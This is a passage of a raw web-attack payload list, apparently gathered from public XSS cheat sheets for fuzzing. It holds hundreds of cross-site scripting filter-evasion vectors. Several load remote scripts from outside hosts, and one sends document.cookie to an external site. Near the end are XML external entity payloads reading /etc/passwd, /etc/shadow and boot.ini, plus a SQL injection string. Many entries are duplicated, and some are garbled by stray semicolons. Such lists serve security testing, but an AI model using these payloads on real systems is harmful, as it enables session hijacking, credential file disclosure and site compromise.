SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <IMG SRC=javascript:alert('XSS')> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav	ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> <IMGSRC="javascript:alert('XSS')"> perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out <IMG SRC="  Â javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT SRC=http://ha.ckers.org/xss.js <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <IFRAME SRC=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <SCRIPT>a=/XSS/ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6	6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC="  javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> </script><script>alert(1)</script> </br style=a:expression(alert())> <scrscriptipt>alert(1)</scrscriptipt> <br size=\"&{alert('XSS')}\"> perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; ';';;!--";<;XSS>;=&;{()} <;SCRIPT>;alert(';XSS';)<;/SCRIPT>; <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>; <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>; <;BASE HREF=";javascript:alert(';XSS';);//";>; <;BGSOUND SRC=";javascript:alert(';XSS';);";>; <;BODY BACKGROUND=";javascript:alert(';XSS';);";>; <;BODY ONLOAD=alert(';XSS';)>; <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>; <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>; <;DIV STYLE=";width: expression(alert(';XSS';));";>; <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>; <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>; <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";javascript:alert(';XSS';);";>; <;IMG SRC=javascript:alert(';XSS';)>; <;IMG DYNSRC=";javascript:alert(';XSS';);";>; <;IMG LOWSRC=";javascript:alert(';XSS';);";>; <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>; Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser exp/*<;XSS STYLE=';no\xss:noxss(";*//*";); <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS <;IMG SRC=';vbscript:msgbox(";XSS";)';>; <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>; <;IMG SRC=";livescript:[code]";>; %BCscript%BEalert(%A2XSS%A2)%BC/script%BE <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>; <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>; <;IMG SRC=";mocha:[code]";>; <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>; <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>; <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>; a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;eval(a+b+c+d); <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>; <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>; <;XSS STYLE=";xss:expression(alert(';XSS';))";>; <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>; <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>; <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>; <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>; <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>; <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>; <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>; <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>; <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>; <;HTML xmlns:xss>; <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>; <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>; <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>; <;HTML>;<;BODY>; <;!--[if gte IE 4]>; Â Â Â Â Â <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>; <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>; <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>; <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->; <;? echo(';<;SCR)';; <;BR SIZE=";&;{alert(';XSS';)}";>; <;IMG SRC=JaVaScRiPt:alert(';XSS';)>; <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>; <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>; <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>; <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>; <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>; <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>; <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4- \";;alert(';XSS';);// <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>; <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>; <;IMG SRC=";jav ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>; <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>; <;IMGSRC=";javascript:alert';XSS';)";>; perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out <;IMG SRC="; &;#14; Â javascript:alert(';XSS';);";>; <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;SCRIPT SRC=http://ha.ckers.org/xss.js <;SCRIPT SRC=//ha.ckers.org/.j>; <;IMG SRC=";javascript:alert(';XSS';)"; <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <; <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>; <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>; <;SCRIPT>;a=/XSS/ <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>; <;A HREF=";http://66.102.7.147/";>;XSS<;/A>; <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>; <;A HREF=";http://1113982867/";>;XSS<;/A>; <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>; <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>; <;A HREF=";htt p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>; <;A HREF=";//www.google.com/";>;XSS<;/A>; <;A HREF=";//google";>;XSS<;/A>; <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>; <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>; <;A HREF=";http://google.com/";>;XSS<;/A>; <;A HREF=";http://www.google.com./";>;XSS<;/A>; <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>; <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>; <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC="  javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br style=a:expression(alert())>; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert('XSS')}\";>; perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> >"><script>alert("XSS")</script>& "><STYLE>@import"javascript:alert('XSS')";</STYLE> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')> <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> Â Â <IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')> <IMG SRC="javascript:alert(<WBR>'XSS');"> <IMG SRC="javascript:alert(<WBR>'XSS');"> <![CDATA[<script>var n=0;while(true){n++;}</script>]]> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> <script>alert('XSS')</script> %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert("XSS")> <IMG SRC=javascript:alert('XSS')> Â Â Â <img src=xss onerror=alert(1)> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY 